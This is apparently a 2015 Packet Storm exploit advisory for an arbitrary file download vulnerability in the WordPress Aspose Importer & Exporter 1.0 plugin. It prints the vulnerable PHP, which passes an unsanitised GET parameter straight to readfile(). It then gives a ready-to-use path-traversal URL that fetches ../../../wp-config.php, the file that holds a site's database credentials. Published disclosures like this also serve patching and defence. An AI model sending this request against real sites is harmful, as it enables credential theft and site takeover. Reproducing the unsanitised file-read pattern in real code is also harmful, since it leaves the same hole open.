WordPress Aspose Importer / Exporter 1.0 File Download

2015-03-29T00:00:00
ID PACKETSTORM:131162
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2015-03-29T00:00:00

Description

                                        
                                            `#########################################  
  
Exploit Title : Wordpress Aspose Importer & Exporter v1.0 Plugin File   
Download Vulnerability  
  
Exploit Author : Ashiyane Digital Security Team  
  
Vendor Homepage: https://wordpress.org/plugins/aspose-importer-exporter/  
  
Download Link :   
https://downloads.wordpress.org/plugin/aspose-importer-exporter.2.0.zip  
  
Date : 28 / 3 / 2015  
  
Tested On : windows 8.1 + linux Kali  
  
#########################################  
#########################################  
  
~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~>  
  
Exploit:  
Vulnerable file :   
http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download  
  
~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~>  
  
Vulnerable Code :  
  
<?php  
  
if(isset($_GET['file'])) {  
  
$file = $_GET['file'];  
  
$file_arr = explode('/',$file);  
  
$file_name = $file_arr[count($file_arr) - 1];  
  
header ("Content-type: octet/stream");  
  
header ("Content-disposition: attachment; filename=".$file_name.";");  
  
header("Content-Length: ".filesize($file));  
  
readfile($file);  
  
exit;  
  
}  
  
http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=[File   
Address]  
  
Examples :   
http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php  
  
#########################################  
#########################################  
  
Discovered by : Rq07  
  
#########################################  
`